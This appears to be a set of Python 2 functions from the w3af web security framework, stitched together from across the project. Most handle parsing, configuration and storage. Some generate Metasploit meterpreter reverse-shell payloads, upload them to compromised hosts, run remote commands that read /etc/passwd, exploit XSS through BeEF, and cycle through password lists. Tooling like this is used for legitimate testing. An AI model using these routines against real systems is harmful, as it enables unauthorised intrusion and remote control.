def __init__(self, w3af, response_list, distance_function=LEVENSHTEIN): ''' @parameter response_list: A list with the responses to graph. ''' self.w3af = w3af w3afDotWindow.__init__(self) self.widget.connect('clicked', self.on_url_clicked) # Now I generate the dotcode based on the data if distance_function == LEVENSHTEIN: dotcode = self._generateDotCode(response_list, distance_function=self._relative_distance) elif distance_function == HTTP_RESPONSE: dotcode = self._generateDotCode(response_list, distance_function=self._http_code_distance) elif distance_function == CONTENT_LENGTH: dotcode = self._generateDotCode(response_list, distance_function=self._response_length_distance) elif distance_function.startswith('def customized_distance'): try: callable_object = self._create_callable_object( distance_function ) except Exception, e: # TODO: instead of hiding..., which may consume memory... why don't killing? self.hide() msg = 'Please review your customized code. An error was raised while compiling: "' msg += str(e) + '"' raise w3afException( msg ) try: dotcode = self._generateDotCode(response_list, distance_function=callable_object) except Exception, e: # TODO: instead of hiding..., which may consume memory... why don't killing? self.hide() msg = 'Please review your customized code. An error was raised on run time: "' msg += str(e) + '"' raise w3afException( msg )
def __init__(self, httpResponse): # Create the proper parser instance, please note that # the order in which we ask for the type is not random, # first we discard the images which account for a great # % of the URLs in a site, then we ask for WML which is # a very specific thing to match, then we try text or HTML # which is very generic (if we would have exchanged these two # we would have never got to WML), etc. if httpResponse.is_image(): msg = 'There is no parser for images.' raise w3afException(msg) elif self._isWML(httpResponse): parser = wmlParser.wmlParser(httpResponse) elif httpResponse.is_text_or_html(): parser = htmlParser.HTMLParser(httpResponse) elif self._isPDF(httpResponse): parser = pdfParser.pdfParser(httpResponse) elif self._isSWF(httpResponse): parser = swfParser.swfParser(httpResponse) else: msg = 'There is no parser for "%s".' % httpResponse.getURL() raise w3afException(msg) self._parser = parser
def find(self, searchData, resultLimit=-1, orderData=[], full=False): '''Make complex search. search_data = {name: (value, operator), ...} orderData = [(name, direction)] ''' if not self._db: raise w3afException('The database is not initialized yet.') result = [] sql = 'SELECT * FROM ' + self._dataTable where = WhereHelper(searchData) sql += where.sql() orderby = "" # # TODO we need to move SQL code to parent class # for item in orderData: orderby += item[0] + " " + item[1] + "," orderby = orderby[:-1] if orderby: sql += " ORDER BY " + orderby sql += ' LIMIT ' + str(resultLimit) try: rawResult = self._db.retrieve(sql, where.values(), all=True) for row in rawResult: item = self.__class__() item._loadFromRow(row, full) result.append(item) except w3afException: raise w3afException('You performed an invalid search. Please verify your syntax.') return result
def _send_exe_to_server(self, exe_file): """ This method should be implemented according to the remote operating system. The idea here is to send the exe_file to the remote server and save it in a file. @param exe_file: The local path to the executable file @return: The name of the remote file that was uploaded. """ om.out.debug("Called _send_exe_to_server()") om.out.console("Wait while w3af uploads the payload to the remote server...") ptf = payloadTransferFactory(self._exec_method) # Now we get the transfer handler wait_time_for_extrusion_scan = ptf.estimateTransferTime() transferHandler = ptf.getTransferHandler() if not transferHandler.canTransfer(): raise w3afException("Can't transfer the file to remote host, canTransfer() returned False.") else: om.out.debug("The transferHandler can upload files to the remote end.") estimatedTime = transferHandler.estimateTransferTime(len(exe_file)) om.out.debug('The payload transfer will take "' + str(estimatedTime) + '" seconds.') self._remote_filename = getRemoteTempFile(self._exec_method) om.out.debug('Starting payload upload, remote filename is: "' + self._remote_filename + '".') if transferHandler.transfer(file(exe_file).read(), self._remote_filename): om.out.console('Finished payload upload to "%s"' % self._remote_filename) return self._remote_filename else: raise w3afException("The payload upload failed, remote md5sum is different.")
def _generate_exe(self, payload, parameters): """ This method should be implemented according to the remote operating system. The idea here is to generate an ELF/PE file and return a string that represents it. The method will basically run something like: msfpayload linux/x86/meterpreter/reverse_tcp LHOST=1.2.3.4 LPORT=8443 X > /tmp/output2.exe @param payload: The payload to generate (linux/x86/meterpreter/reverse_tcp) @param parameters: A list with the parameters to send to msfpayload ['LHOST=1.2.3.4', 'LPORT=8443'] @return: The name of the generated file, in the example above: "/tmp/output2.exe" """ temp_dir = tempfile.gettempdir() randomness = str(random.randint(0, 293829839)) output_filename = os.path.join(temp_dir, "msf-" + randomness + ".exe") command = "%s %s %s X > %s" % (self._msfpayload_path, payload, " ".join(parameters), output_filename) os.system(command) if "reverse" in payload: om.out.console("Remember to setup your firewall to allow the reverse connection!") if os.path.isfile(output_filename): # Error handling file_content = file(output_filename).read() for tag in ["Invalid", "Error"]: if tag in file_content: raise w3afException(file_content.strip()) return output_filename else: raise w3afException("Something failed while creating the payload file.")
def init( self ): ''' Open files and init some variables ''' if not self._already_init: self._already_init = True try: if self._usersFile != "": self._usersFD = open( self._usersFile ) except: raise w3afException('Can\'t open ' + self._usersFile + ' file.') try: if self._passwdFile != "": self._passwordsFD = open( self._passwdFile ) except: raise w3afException('Can\'t open ' + self._passwdFile + ' file.') try: if self._comboFile != "": self._comboFD = open( self._comboFile ) except: raise w3afException('Can\'t open ' + self._comboFile + ' file.') self._genSpecialPasswords() self._genSpecialUsers()
def __init__(self, profname='', workdir=None): ''' Creating a profile instance like p = profile() is done in order to be able to create a new profile from scratch and then call save(profname). When reading a profile, you should use p = profile(profname). ''' # The default optionxform transforms the option to lower case; # w3af needs the value as it is optionxform = lambda opt: opt self._config = ConfigParser.ConfigParser() # Set the new optionxform function self._config.optionxform = optionxform if profname: # Get profile name's complete path profname = self._get_real_profile_name(profname, workdir) with codecs.open(profname, "rb", UTF8) as fp: try: self._config.readfp(fp) except ConfigParser.Error, cpe: msg = 'ConfigParser error in profile: "%s". Exception: "%s"' raise w3afException( msg % (profname, str(cpe))) except Exception, e: msg = 'Unknown error in profile: "%s". Exception: "%s"' raise w3afException( msg % (profname, str(e)))
def _cmd_desc(self, params): if len(params) == 0: raise w3afException("Plugin name is required") pluginName = params[0] if pluginName not in self._plugins: raise w3afException("Unknown plugin: '%s'" % pluginName) plugin = self._w3af.getPluginInstance(pluginName, self._name) om.out.console(str(plugin.getLongDesc()))
def httpRequestParser(head, postdata): ''' This function parses HTTP Requests from a string to a fuzzableRequest. @parameter head: The head of the request. @parameter postdata: The post data of the request @return: A fuzzableRequest object with all the corresponding information that was sent in head and postdata @author: Andres Riancho ( [email protected] ) ''' # Parse the request head splitted_head = head.split('\n') splitted_head = [h.strip() for h in splitted_head if h] if not splitted_head: msg = 'The HTTP request is invalid.' raise w3afException(msg) # Get method, uri, version metUriVer = splitted_head[0] firstLine = metUriVer.split(' ') if len(firstLine) == 3: # Ok, we have something like "GET /foo HTTP/1.0". This is the best case for us! method, uri, version = firstLine elif len(firstLine) < 3: msg = 'The HTTP request has an invalid <method> <uri> <version> token: "' msg += metUriVer +'".' raise w3afException(msg) elif len(firstLine) > 3: # GET /hello world.html HTTP/1.0 # Mostly because we are permissive... we are going to try to send the request... method = firstLine[0] version = firstLine[-1] uri = ' '.join( firstLine[1:-1] ) checkVersionSintax(version) # If we got here, we have a nice method, uri, version first line # Now we parse the headers (easy!) and finally we send the request headers = splitted_head[1:] headersDict = {} for header in headers: one_splitted_header = header.split(':', 1) if len(one_splitted_header) == 1: raise w3afException('The HTTP request has an invalid header: "' + header + '"') headersDict[ one_splitted_header[0].strip() ] = one_splitted_header[1].strip() host = '' for headerName in headersDict: if headerName.lower() == 'host': host = headersDict[headerName] uri = checkURISintax(uri, host) fuzzReq = createFuzzableRequestRaw(method, uri, postdata, headersDict) return fuzzReq
def setValue( self, value ): ''' @parameter value: The value parameter is set by the user interface, which for example sends 'True' or 'a,b,c' Based on the value parameter and the option type, I have to create a nice looking object like True or ['a','b','c']. This replaces the *old* parseOptions. ''' try: if self._type == 'integer': res = int(value) elif self._type == 'float': res = float(value) elif self._type == 'boolean': if value.lower() == 'true': res = True else: res = False elif self._type == 'list': res = [] # Yes, we are regex dummies value += ',' tmp = re.findall('(".*?"|\'.*?\'|.*?),', str(value)) if tmp: tmp = [y.strip() for y in tmp if y != ''] # Now I check for single and double quotes for u in tmp: if ( u.startswith('"') and u.endswith('"') ) or ( u.startswith("'") and u.endswith("'") ): res.append( u[1:-1] ) else: res.append( u ) else: raise ValueError elif self._type in ('string', 'ipport'): res = str(value) elif self._type == 'regex': # Parse regex stuff... try: re.compile(value) except: msg = 'The regular expression "%s" is invalid!' % value raise w3afException( msg ) else: res = value # end regex stuff else: raise w3afException('Unknown type: ' + self._type) except ValueError: raise w3afException('The value "' + value + '" cannot be casted to "' + self._type + '".') else: self._value = res
def setOptions( self, optionsMap ): ''' Handle user configuration parameters. @return: None ''' # The not yet compiled all_in_one_regex tmp_not_compiled_all = [] # # Add the regexes from the file # self._regexlist_compiled = [] regex_file_path = optionsMap['regex_file_path'].getValue() if regex_file_path and not regex_file_path == 'None': self._regex_file_path = regex_file_path current_regex = '' try: f = file( self._regex_file_path) except: raise w3afException('File not found') else: for regex in f: current_regex = regex.strip() try: self._regexlist_compiled.append((re.compile(current_regex, re.IGNORECASE | re.DOTALL), None)) tmp_not_compiled_all.append(current_regex) except: f.close() raise w3afException('Invalid regex in regex file: '+current_regex) f.close() # # Add the single regex # self._single_regex = optionsMap['single_regex'].getValue() if self._single_regex and not self._single_regex == 'None': try: self._regexlist_compiled.append((re.compile(self._single_regex, re.IGNORECASE | re.DOTALL), None)) tmp_not_compiled_all.append(self._single_regex) except: raise w3afException('Invalid regex in the single_regex field!') # # Compile all in one regex # if tmp_not_compiled_all: # get a string like (regexA)|(regexB)|(regexC) all_in_one_uncompiled = '('+')|('.join(tmp_not_compiled_all)+')' self._all_in_one = re.compile(all_in_one_uncompiled, re.IGNORECASE | re.DOTALL)
def run(self, user_defined_parameters): """ This is the entry point. We get here when the user runs the "payload vdaemon linux/x86/meterpreter/reverse_tcp" command in his w3af shell after exploiting a vulnerability. @param user_defined_parameters: The parameters defined by the user, for example, the type of payload to send. @return: True if we succeded. """ # # We follow the same order as MSF, but we only allow the user to generate executable files # # Usage: /opt/metasploit3/msf3/msfpayload <payload> [var=val] ... # msg = "IMPORTANT:\n" msg += " You need to specify the payload type in MSF format as if you " msg += "were calling msfpayload: \n" msg += " linux/x86/meterpreter/reverse_tcp LHOST=1.2.3.4\n" msg += ' And then add a pipe ("|") to add the msfcli parameters for ' msg += "handling the incoming connection (in the case of a reverse " msg += "shell) or connect to the remote server.\n" msg += " A complete example looks like this:\n" msg += " linux/x86/meterpreter/reverse_tcp LHOST=1.2.3.4 | exploit/multi/handler PAYLOAD=linux/x86/meterpreter/reverse_tcp LHOST=1.2.3.4 E" if not len(user_defined_parameters): raise w3afException(msg) found_pipe = False for i in user_defined_parameters: if i == "|": found_pipe = True break else: raise w3afException(msg) msfpayload_parameters = user_defined_parameters[: user_defined_parameters.index("|")] msfcli_parameters = user_defined_parameters[user_defined_parameters.index("|") + 1 :] payload = msfpayload_parameters[0] msfpayload_parameters = msfpayload_parameters[1:] msfcli_handler = msfcli_parameters[0] msfcli_parameters = msfcli_parameters[1:] try: executable_file_name = self._generate_exe(payload, msfpayload_parameters) except Exception, e: raise w3afException('Failed to create the payload file, error: "%s".' % str(e))
def exploit( self, vulnToExploit=None ): ''' Exploits a XSS vuln that was found and stored in the kb. @return: True if the shell is working and the user can start calling specific_user_input ''' om.out.console( 'Browser Exploitation Framework - by Wade Alcorn http://www.bindshell.net' ) xss_vulns = kb.kb.getData( 'xss' , 'xss' ) if not self.canExploit(): raise w3afException('No cross site scripting vulnerabilities have been found.') # First I'll configure the beef server, if this is unsuccessfull, then nothing else # should be done! # # GET http://localhost/beef/submit_config.php?config=http://localhost/beef/&passwd= #beEFconfigPass HTTP/1.1 config_URL = self._beefURL.urlJoin('submit_config.php' ) config_URI = config_URL + '?config=' + self._beefURL + '&passwd=' + self._beefPasswd config_URI = url_object( config_URI ) response = self._urlOpener.GET( config_URI ) if response.getBody().count('BeEF Successfuly Configured'): # everything ok! pass elif 'Incorrect BeEF password, please try again.' in response.getBody(): raise w3afException('Incorrect password for beEF configuration.') elif 'Permissions on the' in response.getBody(): raise w3afException('Incorrect BeEF installation') else: raise w3afException('BeEF installation not found.') # Try to get a proxy using one of the vulns for vuln_obj in xss_vulns: msg = 'Trying to exploit using vulnerability with id: ' + str( vuln_obj.getId() ) om.out.console( msg ) if self._generateProxy(vuln_obj): # TODO: Create a proxy instead of a shell # Create the shell object shell_obj = xssShell(vuln_obj) shell_obj.setBeefURL( self._beefURL ) kb.kb.append( self, 'shell', shell_obj ) return [ shell_obj, ] else: msg = 'Failed to exploit using vulnerability with id: ' + str( vuln_obj.getId() ) om.out.console( msg ) return []
def osDetectionExec( execMethod ): ''' Uses the execMethod to run remote commands and determine what's the remote OS is and returns a string with 'windows' or 'linux' or raises a w3afException if unknown. ''' try: linux1 = apply( execMethod, ( 'echo -n w3af',)) linux2 = apply( execMethod, ( 'head -n 1 /etc/passwd',)) except: pass else: if 'w3af' == linux1 and linux2.count(':') > 2: om.out.debug('Identified remote OS as Linux, returning "linux".') return 'linux' try: # Try if it's a windows system win1 = apply( execMethod, ( 'type %SYSTEMROOT%\\win.ini',)) win2 = apply( execMethod, ( 'echo /?',)) except: pass else: if '[fonts]' in win1 and 'ECHO' in win2: om.out.debug('Identified remote OS as Windows, returning "windows".') return 'windows' raise w3afException('Failed to get/identify the remote OS.')
def _getUser( self ): ''' Get the user for this combination. ''' user = None if self._eofUsers: # The file with users is now over, here i'll add the "special" users # This variable (self._nextUser) is modified to True by the _getPassword method. if self._nextUser: self._specialUserIndex += 1 self._nextUser = False if len( self._specialUsers ) > self._specialUserIndex: user = self._specialUsers[ self._specialUserIndex ] else: self._specialPassIndex = -1 raise w3afException('No more users to test.') else: if self._nextUser: self._nextUser = False user = self._user = self._usersFD.readline().strip() if user == '': self._eofUsers = True else: user = self._user return user
def _do_google_search(self): start = self._start res_pages = [] max_start = start + self._count param_dict = {'dc': 'gorganic', 'hl': 'en', 'q': self._query, 'sa': 'N', 'source': 'mobileproducts'} there_is_more = True while start < max_start and there_is_more: param_dict['start'] = start params = urllib.urlencode(param_dict) gm_url = self.GOOGLE_SEARCH_URL + params gm_url_instance = url_object(gm_url) response = self._do_GET( gm_url_instance ) if GOOGLE_SORRY_PAGE in response: raise w3afException( 'Google is telling us to stop doing automated tests.') if not self._has_more_items(response.getBody()): there_is_more = False res_pages.append(response) start += 10 return res_pages
def _do_google_search(self): res_pages = [] start = self._start max_start = start + self._count there_is_more = True while start < max_start and there_is_more: params = urllib.urlencode({'hl': 'en', 'q': self._query, 'start': start, 'sa': 'N'}) google_url_instance = url_object(self.GOOGLE_SEARCH_URL + params) response = self._do_GET( google_url_instance ) # Remember that httpResponse objects have a faster "__in__" than # the one in strings; so string in response.getBody() is slower than # string in response if GOOGLE_SORRY_PAGE in response: raise w3afException( 'Google is telling us to stop doing automated tests.') if not self._has_more_items(response.getBody()): there_is_more = False # Save the result page res_pages.append(response) start += 10 return res_pages
def _send_requests( self, fuzzableRequest ): ''' Actually send the requests that might be blocked. @parameter fuzzableRequest: The fuzzableRequest to modify in order to see if it's blocked ''' rnd_param = createRandAlNum(7) rnd_value = createRandAlNum(7) original_url_str = fuzzableRequest.getURL() + '?' + rnd_param + '=' + rnd_value original_url = url_object(original_url_str) try: original_response_body = self._urlOpener.GET( original_url , useCache=True ).getBody() except Exception: msg = 'Active filter detection plugin failed to receive a ' msg += 'response for the first request. Can not perform analysis.' raise w3afException( msg ) else: original_response_body = original_response_body.replace( rnd_param, '' ) original_response_body = original_response_body.replace( rnd_value, '' ) for offending_string in self._get_offending_strings(): offending_URL = fuzzableRequest.getURL() + '?' + rnd_param + '=' + offending_string # Perform requests in different threads targs = (offending_string, offending_URL, original_response_body, rnd_param) self._tm.startFunction( target=self._send_and_analyze, args=targs, ownerObj=self ) # Wait for threads to finish self._tm.join( self ) # Analyze the results return self._filtered, self._not_filtered
def _verifyURL(self, target_url, fileTarget=True): ''' Verify if the URL is valid and raise an exception if w3af doesn't support it. >>> ts = targetSettings() >>> ts._verifyURL( url_object('ftp://www.google.com/') ) Traceback (most recent call last): ... w3afException: Invalid format for target URL "ftp://www.google.com/", you have to specify the protocol (http/https/file) and a domain or IP address. Examples: http://host.tld/ ; https://127.0.0.1/ . >>> ts._verifyURL( url_object('http://www.google.com/') ) >>> ts._verifyURL( url_object('http://www.google.com:39/')) is None True @param target_url: The target URL object to check if its valid or not. @return: None. A w3afException is raised on error. ''' protocol = target_url.getProtocol() domain = target_url.getDomain() or '' aFile = fileTarget and protocol == 'file' and domain aHTTP = protocol in ['http', 'https'] and target_url.is_valid_domain() if not (aFile or aHTTP): msg = 'Invalid format for target URL "%s", you have to specify ' \ 'the protocol (http/https/file) and a domain or IP address. ' \ 'Examples: http://host.tld/ ; https://127.0.0.1/ .' % target_url raise w3afException( msg )
def _init(self): try: self._file = open(self._file_name, "w") except IOError, io: msg = "Can't open report file \"" + os.path.abspath(self._file_name) + '" for writing' msg += ': "' + io.strerror + '".' raise w3afException(msg)
def read(self, id, full=True): '''Return item by ID.''' if not self._db: raise w3afException('The database is not initialized yet.') resultItem = self.__class__() resultItem.load(id, full) return resultItem
def _preParse(self, document): ''' Parse the document! @parameter document: The document that we want to parse. ''' raise w3afException('You have to override the _preParse method when subclassing sgmlParser class.')
def getRemoteTempFile( execMethod ): ''' @return: The name of a file in the remote file system that the user that I'm executing commands with can write, read and execute. The normal responses for this are files in /tmp/ or %TEMP% depending on the remote OS. ''' os = osDetectionExec( execMethod ) if os == 'windows': _filename = apply( execMethod, ('echo %TEMP%',) ).strip() + '\\' _filename += createRandAlNum(6) # verify existance dirRes = apply( execMethod, ('dir '+_filename,) ).strip().lower() if 'not found' in dirRes: # Shit, the file exists, run again and see what we can do return getRemoteTempFile( execMethod ) else: return _filename return _filename elif os == 'linux': _filename = '/tmp/' + createRandAlNum( 6 ) # verify existance lsRes = apply( execMethod, ('ls '+_filename,) ).strip() if _filename == lsRes: # Shit, the file exists, run again and see what we can do return getRemoteTempFile( execMethod ) else: return _filename else: raise w3afException('Failed to create filename for a temporary file in the remote host.')
def initStructure(self): '''Init history structure.''' sessionName = cf.cf.getData('sessionName') dbName = os.path.join(get_temp_dir(), 'db_' + sessionName) self._db = DB() # Check if the database already exists if os.path.exists(dbName): # Find one that doesn't exist for i in xrange(100): newDbName = dbName + '-' + str(i) if not os.path.exists(newDbName): dbName = newDbName break self._db.connect(dbName) self._sessionDir = os.path.join(get_temp_dir(), self._db.getFileName() + '_traces') tablename = self.getTableName() # Init tables self._db.createTable( tablename, self.getColumns(), self.getPrimaryKeyColumns()) self._db.createIndex(tablename, self.getIndexColumns()) # Init dirs try: os.mkdir(self._sessionDir) except OSError, oe: # [Errno EEXIST] File exists if oe.errno != EEXIST: msg = 'Unable to write to the user home directory: ' + get_temp_dir() raise w3afException(msg)
def _get_real_profile_name(self, profilename, workdir): ''' Return the complete path for `profilename`. @raise w3afException: If no existing profile file is found this exception is raised with the proper desc message. ''' # Alias for os.path. Minor optimization ospath = os.path pathexists = os.path.exists # Add extension if necessary if not profilename.endswith('.pw3af'): profilename += '.pw3af' profname = profilename # Try to find the file found = pathexists(profname) if not (ospath.isabs(profname) or found): profname = ospath.join(get_home_dir(), 'profiles', profilename) found = pathexists(profname) # Ok, let's try to find it in the passed working directory. if not found and workdir: profname = ospath.join(workdir, profilename) found = pathexists(profname) if not found: raise w3afException('The profile "%s" wasn\'t found.' % profilename) return profname
def getPluginOptions( self, pluginType, pluginName ): ''' @return: A dict with the options for a plugin. For example: { 'LICENSE_KEY':'AAAA' } ''' # Get the plugin defaults with their types pluginInstance = factory('plugins.' + pluginType + '.' + pluginName ) optionsMap = pluginInstance.getOptions() for section in self._config.sections(): # Section is something like audit.xss or discovery.webSpider try: type, name = section.split('.') except: pass else: if type == pluginType and name == pluginName: for option in self._config.options(section): try: value = self._config.get(section, option) except KeyError,k: # We should never get here... msg = 'The option "%s" is unknown for the "%s" plugin.' raise w3afException( msg % (option, pluginName) ) else: optionsMap[option].setValue(value)
def setOptions( self, optionsMap ): ''' This method sets all the options that are configured using the user interface generated by the framework using the result of getOptions(). @parameter optionsMap: A dictionary with the options for the plugin. @return: No value is returned. ''' cf.cf.save('fuzzableCookie', optionsMap['fuzzCookie'].getValue() ) cf.cf.save('fuzzFileContent', optionsMap['fuzzFileContent'].getValue() ) cf.cf.save('fuzzFileName', optionsMap['fuzzFileName'].getValue() ) cf.cf.save('fuzzFCExt', optionsMap['fuzzFCExt'].getValue() ) cf.cf.save('fuzzFormComboValues', optionsMap['fuzzFormComboValues'].getValue() ) cf.cf.save('autoDependencies', optionsMap['autoDependencies'].getValue() ) cf.cf.save('maxDiscoveryTime', optionsMap['maxDiscoveryTime'].getValue() ) if optionsMap['maxThreads'].getValue() > 100: raise w3afException('The maximum valid number of threads is 100.') max_threads = optionsMap['maxThreads'].getValue() cf.cf.save('maxThreads', max_threads ) tm.setMaxThreads( max_threads ) cf.cf.save('fuzzableHeaders', optionsMap['fuzzableHeaders'].getValue() ) cf.cf.save('interface', optionsMap['interface'].getValue() ) cf.cf.save('localAddress', optionsMap['localAddress'].getValue() ) cf.cf.save('demo', optionsMap['demo'].getValue() ) cf.cf.save('nonTargets', optionsMap['nonTargets'].getValue() ) cf.cf.save('exportFuzzableRequests', optionsMap['exportFuzzableRequests'].getValue() ) cf.cf.save('msf_location', optionsMap['msf_location'].getValue() )
def getRemoteFileSize( self, req, useCache=True ): ''' This method was previously used in the framework to perform a HEAD request before each GET/POST (ouch!) and get the size of the response. The bad thing was that I was performing two requests for each resource... I moved the "protection against big files" to the keepalive.py module. I left it here because maybe I want to use it at some point... Mainly to call it directly or something. @return: The file size of the remote file. ''' res = self.HEAD( req.get_full_url(), headers=req.headers, data=req.get_data(), useCache=useCache ) resource_length = None for i in res.getHeaders(): if i.lower() == 'content-length': resource_length = res.getHeaders()[ i ] if resource_length.isdigit(): resource_length = int( resource_length ) else: msg = 'The content length header value of the response wasn\'t an integer...' msg += ' this is strange... The value is: "' + res.getHeaders()[ i ] + '"' om.out.error( msg ) raise w3afException( msg ) if resource_length is not None: return resource_length else: msg = 'The response didn\'t contain a content-length header. Unable to return the' msg += ' remote file size of request with id: ' + str(res.id) om.out.debug( msg ) # I prefer to fetch the file, before this om.out.debug was a "raise w3afException", but this didnt make much sense return 0
def getName( self ): ''' This method is called when the shell is used, in order to create a prompt for the user. @return: The name of the shell ( osCommandingShell, davShell, etc ) ''' raise w3afException('You should implement the getName method of classes that inherit from "shell"')
def load(self, id=None, full=True, retry=True): '''Load data from DB by ID.''' if not self._db: raise w3afException('The database is not initialized yet.') if not id: id = self.id sql = 'SELECT * FROM ' + self._dataTable + ' WHERE id = ? ' try: row = self._db.retrieve(sql, (id,)) except Exception, e: msg = 'An unexpected error occurred while searching for id "%s".' msg += ' Original exception: "%s".' msg = msg % (id, e) raise w3afException( msg )